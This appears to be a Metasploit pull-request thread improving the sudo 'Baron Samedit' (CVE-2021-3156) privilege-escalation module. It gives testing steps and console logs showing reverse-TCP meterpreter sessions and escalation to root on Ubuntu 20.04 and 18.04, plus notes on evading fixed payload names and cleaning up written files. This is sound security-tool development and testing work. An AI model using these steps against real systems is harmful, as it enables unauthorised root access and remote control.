CVE-2021-3156 Sudo LPE (AKA: Baron Samedit) Improvements

[zeroSteiner]

This makes a few improvements to the CVE-2021-3156 and adds a couple of features that were left out of the first submission due to time constraints. Unfortunately, I don't have any new targets to add yet. I made a couple of changes to the Linux mixins as well to facilitate what I was doing.

• Update the mkdir mixin command to handle existing directories in the same way for meterpreter sessions as shell sessions (don't raise an exception).
• Randomize the payload library that's loaded on disk.
• Added a new "Automatic" target (and set it as the default) that selects a target via a regex fingerprint and get_sysinfo.
  • Updated get_sysinfo to remove leading and trailing whitespace around the version key
• Fixed handling spaces in the WriteableDir datastore option. This involved updating the compiler mixin as well to escape spaces with backslashes.
• Registered files for cleanup so everything that's written to disk as part of the exploitation process is now removed.

Testing

• Get a non-root meterpreter session on an affected system (Ubuntu 20.04 works well)
• Run: use exploit/linux/local/sudo_baron_samedit
• Set the payload, RHOST and LHOST options as desired
• Set the target to Automatic if necessary (it should be the default)
• Set the WriteableDir to /tmp/Hello World or something else with a space in it. Make sure the directory already exists on the target system, the module will not create it automatically.
• Run the exploit
  • See in the output that the correct exploit target was automatically selected
  • See that the payload that is written to disk has been randomized (it's not libnss_X/P0P_SH3LLZ_ .so.2 anymore)
  • See the exploit complete successfully and that the payload executed
  • See that all of the written files on the disk were removed automatically (this happens even if the exploit fails which you can test by setting the target to a different value)

Example Output

msf6 exploit(multi/ssh/sshexec) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.34:22 - Sending stager...
[*] Command Stager progress -  42.75% done (342/800 bytes)
[*] Sending stage (980808 bytes) to 192.168.159.34
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.34:47868) at 2021-02-11 11:55:21 -0500
[!] Timed out while waiting for command to return
[*] Command Stager progress - 100.00% done (800/800 bytes)

meterpreter > getuid
Server username: smcintyre @ ubuntu (uid=1000, gid=1000, euid=1000, egid=1000)
meterpreter > sysinfo
Computer     : 192.168.159.34
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/ssh/sshexec) > use exploit/linux/local/sudo_baron_samedit
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(linux/local/sudo_baron_samedit) > set TARGET Automatic
TARGET => Automatic
msf6 exploit(linux/local/sudo_baron_samedit) > exploit

[!] SESSION may not be compatible with this module.
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. sudo 1.8.31 maybe a vulnerable build.
[*] Using automatically selected target: Ubuntu 20.04 x64 (sudo v1.8.31, libc v2.31)
[*] Writing '/tmp/libnss_9S9MeS/tB8M .so.2' (564 bytes) ...
[*] Sending stage (3008420 bytes) to 192.168.159.34
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.34:47870) at 2021-02-11 11:55:56 -0500
[+] Deleted /tmp/p60htQTDNO
[+] Deleted /tmp/libnss_9S9MeS/tB8M .so.2
[+] Deleted /tmp/libnss_9S9MeS

meterpreter > getuid
Server username: root @ ubuntu (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 192.168.159.34
OS           : Ubuntu 20.04 (Linux 5.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >

Library Name

The library name is randomized now, however since it's part of the memory corruption chain there are some constraints on it. From my testing, I noticed that the randomized component:

• Must be exactly 13 characters long
• Must contain exactly one / which may be placed anywhere in the string

The original C exploit was updated to take the library name as an option parameter at the end. If it's omitted the original X/P0P_SH3LLZ_ value is used, allowing the exploit to still bbe compiled and run as a standalone unit.

[bcoles]

Here's another recent writeup about the libnss technique which may be useful as a reference URL. Targets Fedora 33, sudo 1.9.4p2 and 1.9.5p1 using GLibc 2.32.

• https://blog.infosectcbr.com.au/2021/02/sudoedit-heap-overflow.html

[je5442804]

May it possible to add CentOS target?

[bcoles]

May it possible to add CentOS target?

No one has developed offsets for CentOS yet. Check out this writeup for information on the exploitation technique and adding targets.

[timwr]

Code looks good, however for some reason I can't reproduce this (and the original poc) on a Ubuntu 20.04.1 VM.

[timwr]

Works well on Ubuntu 18.04:

msf6 exploit(multi/handler) > [*] Sending stage (3008420 bytes) to 192.168.13.114
[*] Meterpreter session 1 opened (192.168.13.37:4444 -> 192.168.13.114:60584) at 2021-02-22 17:58:41 +0000

msf6 exploit(multi/handler) > use exploit/linux/local/sudo_baron_samedit
[*] No payload configured, defaulting to linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/sudo_baron_samedit) > set LHOST 192.168.13.37
LHOST => 192.168.13.37
msf6 exploit(linux/local/sudo_baron_samedit) > set LPORT 4427
LPORT => 4427
msf6 exploit(linux/local/sudo_baron_samedit) > set SESSION 1
SESSION => 1
msf6 exploit(linux/local/sudo_baron_samedit) > run

[*] Started reverse TCP handler on 192.168.13.37:4427
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable. sudo 1.8.21.2 is a vulnerable build.
[*] Using automatically selected target: Ubuntu 18.04 x64 (sudo v1.8.21, libc v2.27)
[*] Writing '/tmp/libnss_wBjg/QaNxg1 .so.2' (564 bytes) ...
[*] Sending stage (3008420 bytes) to 192.168.13.114
[*] Meterpreter session 2 opened (192.168.13.37:4427 -> 192.168.13.114:43306) at 2021-02-22 17:59:06 +0000
[+] Deleted /tmp/M4v8MGU98
[+] Deleted /tmp/libnss_wBjg/QaNxg1 .so.2
[+] Deleted /tmp/libnss_wBjg


meterpreter >
meterpreter > getuid
Server username: root @ user-vm (uid=0, gid=0, euid=0, egid=0)

[timwr]

Release Notes

Improved the CVE-2021-3156 (a.k.a. Baron Samedit) module with a couple of features that were left out of the first submission due to time constraints (e.g cleanup and randomisation of the payload library). Also added a target for Ubuntu 19.04.

[bcoles]

This makes a few improvements to the CVE-2021-3156 and adds a couple of features that were left out of the first submission due to time constraints (e.g cleanup and randomisation of the payload library).

Also adds a target for Ubuntu 19.04.